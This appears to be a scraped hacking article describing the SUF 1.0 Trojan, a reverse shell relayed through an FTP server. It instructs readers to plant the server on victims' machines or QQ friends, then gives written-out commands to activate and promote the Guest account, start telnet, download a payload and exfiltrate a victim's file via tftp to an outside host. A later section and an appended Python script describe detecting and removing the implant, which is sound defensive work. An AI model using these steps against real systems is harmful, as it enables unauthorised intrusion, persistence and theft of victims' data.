Dual-channel network intrusion

Source: Internet
Author: User
Tags: ftp commands
After countless experiments, a 14-year-old boy released a new Trojan, SUF 1.0, which is built on the "bounce port principle" and "FTP tunneling": the two machines never exchange data directly, but relay it through a third machine, an FTP server.
As the name suggests, SUF (Shell Use FTP) is a shell delivered over FTP. The idea is simple but effective: it takes advantage of the "strict security" of firewalls, which block almost everything yet still let outbound FTP through. After the client generates a server program, it uploads a file containing the client host's IP address to the FTP server. When someone runs the server program, it downloads that IP address file and makes a reverse connection so the client knows the server is online. The client then uploads the commands to be executed to the FTP server, the server reads them from the FTP server and executes them, and the cycle is complete.
So much for the theory. Is SUF really that powerful? Let the facts speak. Come with me ......
1. Configure the server
Like most Trojan backdoors, the setup is routine. First decompress the downloaded SUF 1.0 and double-click the client.exe inside it. The main window appears, and it is very concise and clear. Click "configure Server" and the configuration dialog is displayed; only the FTP service options need to be filled in. In the "ftp" field, enter an FTP server on which you have write permission, for example ftp.abc.com or 220.202.242.98. In the "Port" field, enter the FTP server port; the default is 21. Finally, complete the configuration.
TIPS: If you want to pack (shell) the server, pack server.exe before configuring it. The server can be configured repeatedly. Make sure that the FTP account you use has write permission on the FTP server.
2. Hands-on: easy control
The next step is the same as with any Trojan or backdoor: planting it. There are many ways to plant a Trojan, and we have covered them in past articles, so use your own talents to upload the server to bots or send it to QQ friends. When the server program runs, an ordinary user will hardly notice anything abnormal on the computer and the firewall will not raise an alarm. In fact, a black hand is slowly approaching: the server program automatically fetches the client's IP address from the FTP server and then starts the reverse connection, and the IP address of the server computer appears in the "online list" of the client.
Tip: the client computer must be directly connected to the Internet, not on an intranet. If a firewall is enabled, open port 5915.
In the online list, double-click the IP address of an online computer (for example, 220.202.242.100). The "connect to 220.202.242.100" dialog box appears, giving you a shell with SYSTEM permissions on the target computer. You can do whatever you want!
Think about whether to keep it as a zombie at your service, or leave a backdoor for future visits! Here we will activate the Guest account, promote it to Administrator, and then enable the Telnet service on the target computer. How? Enter the command net user guest /active:yes and click "run" to activate the Guest account; then run net localgroup administrators guest /add to add guest to the Administrators group, and run net start telnet to start the remote logon service on the target computer.
In fact, a lot can be done from here, such as remote file download/upload through FTP commands or TFTP. For example, run the command: tftp 220.202.242.99 get sy.exe. To upload a data file ccash.doc from the bot to the TFTP server, run the command: tftp 220.202.242.99 put ccash.doc.
Tip: Windows ships with a simple file upload/download program, tftp.exe. To set up a TFTP server, use tftpd32.
3. Getting rid of control: isolating the tunnel
Although the SUF 1.0 technique is very well concealed, it can still be defeated. You can use Active Ports (http://www.ldcatv.com/soft/aports.rar) or another real-time port monitoring tool to find and stop it. If the SUF backdoor is in place, you will find two server.exe entries in the main window of the Active Ports listener: one communicates with the FTP server through local port 4319, the other with the client computer through local port 4321. Select them and click "Terminate process" to end the process. Then delete server.exe in Explorer, and you are rid of SUF control.
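The two-connection signature just described (one established FTP control session plus a second established connection from the same process to a different host) can be checked automatically. The following script is an added example for defenders and is not part of the original article or of SUF itself; the netstat-style lines, the PID-to-image map and the process names in it are constructed to mirror the ports mentioned above (4319 to FTP port 21, 4321 to the client on 5915).

```python
from collections import defaultdict

FTP_PORTS = {21}

# Constructed sample in the shape of Windows `netstat -ano` TCP rows
# (Proto, Local Address, Foreign Address, State, PID). Not real captured data.
NETSTAT_SAMPLE = """\
TCP    192.168.1.10:4319    220.202.242.98:21      ESTABLISHED     1604
TCP    192.168.1.10:4321    220.202.242.100:5915   ESTABLISHED     1604
TCP    192.168.1.10:49210   93.184.216.34:443      ESTABLISHED     2312
TCP    0.0.0.0:135          0.0.0.0:0              LISTENING       884
"""
# Constructed PID -> image map (in practice taken from `tasklist`); assumed names.
PID_IMAGE = {1604: "server.exe", 2312: "browser.exe", 884: "svchost.exe"}


def parse_netstat(text):
    """Parse TCP rows into dicts; UDP rows (no State column) are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        _, local, remote, state, pid = parts
        rip, rport = remote.rsplit(":", 1)
        rows.append({"remote_ip": rip, "remote_port": int(rport),
                     "state": state, "pid": int(pid)})
    return rows


def find_dual_channel(rows, images):
    """Return {pid: finding} for every process that holds an established
    FTP control session AND a second established connection to a different
    host: the relay (FTP) leg plus the direct reverse leg of one implant."""
    by_pid = defaultdict(list)
    for r in rows:
        if r["state"] == "ESTABLISHED":
            by_pid[r["pid"]].append(r)
    findings = {}
    for pid, conns in by_pid.items():
        ftp_hosts = {c["remote_ip"] for c in conns if c["remote_port"] in FTP_PORTS}
        if not ftp_hosts:
            continue
        peers = sorted(f'{c["remote_ip"]}:{c["remote_port"]}' for c in conns
                       if c["remote_ip"] not in ftp_hosts)
        if peers:
            findings[pid] = {"image": images.get(pid, "?"),
                             "ftp_hosts": sorted(ftp_hosts), "peers": peers}
    return findings


if __name__ == "__main__":
    for pid, f in find_dual_channel(parse_netstat(NETSTAT_SAMPLE), PID_IMAGE).items():
        print(f"PID {pid} ({f['image']}): FTP {f['ftp_hosts']} + direct {f['peers']}")
```

A hit means the firewall's "FTP is allowed" rule is not enough on its own; the process behind the FTP session is what needs to be examined and, if unknown, terminated and removed as described above.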
